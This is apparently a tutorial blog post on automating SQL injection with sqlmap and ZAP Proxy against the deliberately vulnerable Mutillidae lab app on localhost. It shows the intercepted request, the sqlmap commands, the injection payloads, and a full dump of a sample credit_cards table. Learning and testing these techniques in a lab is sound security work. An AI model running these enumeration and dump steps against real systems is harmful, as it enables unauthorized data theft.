In my favorite computer game «Quest for Glory 2: Trial by Fire», when the world is once again on a brink of destruction, our hero gets to the Wizard’s Institute of Technocery. After successfully passing the exams wise magicians offer you to enter this University because, having finished it, our hero will understand all subtleties of magic, study all the possible spells and then save all his friends and the whole world. The problem is that the study will take about 15-20 years, and during this time forces of evil will win once and for all.
I recall this episode each time when I have another thick book or pile of whitepapers in front of me. There are tons of books about time management, but for me it all boils down to the simple formula: get used with the basics, study a lot of examples and automate everything else.
Now we have an idea how injections work, why not try to make your life little easier and return to past examples, but with the help of additional software. We’ll need two tools:
- Sqlmap is a tool that allows you to automate the search and exploitation of vulnerabilities in SQL.
- ZAP Proxy is a local proxy server that is needed to analyze traffic between the browser and the web server.
It is necessary to mention, that these are not the only tools out there, and in the neighboring blog you’ll certainly find reasons to use sqlninja instead of sqlmap, and burp instead of ZAP. I’m not going to argue with anyone on this.
Let’s start with intercepting traffic between the client and the web server. The collected data will be used as parameter for sqlmap. By and large, the URL of the vulnerable web application can be used as such a parameter, but proxy data will be a little more intuitive for us.
We will work with the same example from A1, which we have taken up in the previous article («SQLi – Extract Data» > «User Info (SQL)»).
Let’s visit this page through our ZAP Proxy and enter some data. I understand that there is a great temptation to try something that we have learned, but just for now we simply need to enter pretty much anything. I’ll enter my favorite admin/password and intercept this request:
GET http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=password&user-info-php-submit-button=View+Account+Details HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://127.0.0.1/mutillidae/index.php?page=user-info.php Cookie: showhints=1; PHPSESSID=aqvrdm615sm8k7isopefgbhega Connection: keep-alive Upgrade-Insecure-Requests: 1 Host: 127.0.0.1
Here we are interested in the first line, the request itself. Sometimes it is useful to check if works correctly. You can do this by repeating this generated query in the same browser. If we get the same page with an error, then we are on the right track.
Let’s save our intercepted request as a separate file request_sqlmap.txt. Now let’s pass this file for analysis in sqlmap:
sqlmap -r reqest_sqlmap.txt --banner
The –banner parameter is needed to determine which DMBS we are dealing with. In our example, this is not that important, but in real life you will be able to speed up testing without being distracted by aspects of other DBMS that are not applicable to your case.
[23:19:48] [INFO] GET parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 181 HTTP(s) requests: --- Parameter: username (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=user-info.php&username=admin' AND (SELECT 5399 FROM(SELECT COUNT(*),CONCAT(0x7171707871,(SELECT (ELT(5399=5399,1))),0x71706a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UUZA'='UUZA&password=password&user-info-php-submit-button=View Account Details Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: page=user-info.php&username=admin' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171707871,0x4d754c5372467a65665a4c7672636e4c4a554777547162474e666f784e6b69754a43544a41675a50,0x71706a6271),NULL,NULL,NULL-- GGvT&password=password&user-info-php-submit-button=View Account Details --- [23:20:10] [INFO] the back-end DBMS is MySQL [23:20:10] [INFO] fetching banner web server operating system: Windows web application technology: Apache 2.4.29, PHP 7.2.3 back-end DBMS: MySQL >= 5.0 banner: '10.1.31-MariaDB' [23:20:10] [INFO] fetched data logged to text files under '/home/belowzero273/.sqlmap/output/127.0.0.1'
Initial scanning is done and we can see an expected result:
[23:19:48] [INFO] GET parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
Sqlmap also detected that we are dealing with mysql, or rather its fork. Ok. Now let’s see what databases are there on the server:
sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL --dbs
Here we’ve added some addition keys: -p, –dbms and –dbs to get data about existing databases:
[23:27:19] [WARNING] reflective value(s) found and filtering out available databases : [*] information_schema [*] mutillidae [*] mysql [*] performance_schema [*] phpmyadmin [*] test
Cool. Usually databases have meaningful names, or they are created automatically when applications are installed. The «Security by obscurity» principle is little outdated but still quite popular for some reason. The most interesting thing in our case is Mutillidae base, let’s see what it consists of:
sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae --tables
Here we will specify the necessary DBMS and the –tables key to our command to get tables of this database:
[23:29:42] [WARNING] reflective value(s) found and filtering out Database: mutillidae [13 tables] +----------------------------+ | accounts | | balloon_tips | | blogs_table | | captured_data | | credit_cards | | help_texts | | hitlog | | level_1_help_include_files | | page_help | | page_hints | | pen_test_tools | | user_poll_results | | youtubevideos | +----------------------------+
That’s good. The credit_cards table looks particularly promising. Let’s look at it:
sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae -T credita_cards --columns
and we get:
[23:31:35] [WARNING] reflective value(s) found and filtering out Database: mutillidae Table: credit_cards [4 columns] +------------+---------+ | Column | Type | +------------+---------+ | ccid | int(11) | | ccnumber | text | | ccv | text | | expiration | date | +------------+---------+
Wow, there’s a whole table where credit card data should be stored! Let’s take a look at this table:
sqlmap -r reqest_sqlmap.txt -p username --dbms=MySQL -D mutillidae -T credit_cards --dump
[23:32:42] [WARNING] reflective value(s) found and filtering out Database: mutillidae Table: credit_cards [5 entries] +------+-----+----------------------------+-----------------+ | ccid | ccv | ccnumber | expiration | +------+-----+----------------------------+-----------------+ | 1 | 745 | 4444111122223333 | 2012-03-01 | | 2 | 722 | 7746536337776330 | 2015-04-01 | | 3 | 461 | 8242325748474749 | 2016-03-01 | | 4 | 230 | 7725653200487633 | 2017-06-01 | | 5 | 627 | 1234567812345678 | 2018-11-01 | +------+-----+----------------------------+-----------------+
Here they are, our credit cards. You should have two big burning questions in your head right now: how does it even possible and where does all this data come from?
How does it possible? Well, strictly speaking, just as if you were browsing through all the possible options, trying randomly exploit vulnerability.
And the second question is a question for the administrator who left such important information in such a wrong place.
Sqlmap has dozens of parameters that we can’t learn in one article. But the goal of my articles is to introduce problems and technique, everything else is up to you.
Try to dig the rest of the databases and experiment with the parameters, perhaps credit cards aren’t the most interesting things here.